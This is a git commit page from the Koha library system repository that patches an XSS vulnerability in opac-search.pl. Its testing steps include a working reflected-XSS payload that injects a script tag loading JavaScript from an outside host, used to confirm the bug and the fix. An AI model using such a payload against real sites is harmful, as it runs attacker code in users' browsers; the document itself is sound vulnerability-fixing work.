]> git.koha-community.org Git - koha.git/commit
projects / koha.git / commit
? search:
summary | shortlog | log | commit | commitdiff | tree
(parent: 4a414a0) | patch
Bug 14418 XSS Vulnerabilities
authorChris Cormack <chrisc@catalyst.net.nz>
Thu, 18 Jun 2015 21:25:22 +0000 (09:25 +1200)
committerMason James <mtj@kohaaloha.com>
Sun, 21 Jun 2015 17:37:57 +0000 (05:37 +1200)
commit336264936a81a971dfb2fdc1a687d03b61a01a86
tree79f126aa3201f4bfb039305ae4f78f81fd50e5b6tree | snapshot
parent4a414a044d1792baa6a588c275b7c74ad07833e4commit | diff
Bug 14418 XSS Vulnerabilities

Fix for /cgi-bin/koha/opac-search.pl

To test

1/ Hit /cgi-bin/koha/opac-search.pl?tag="><script
src='http://cst.sba-research.org/x.js'/>&q=a
2/ Notice the js is executed
3/ Apply patch
4/ Reload page, notice it is no longer executed
5/ Test the rss links work still

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Confirmed bug and that the patch fixes it.
Signed-off-by: Mason James <mtj@kohaaloha.com>
koha-tmpl/opac-tmpl/bootstrap/en/modules/opac-results.tt diff | blob | history
Main Koha release repository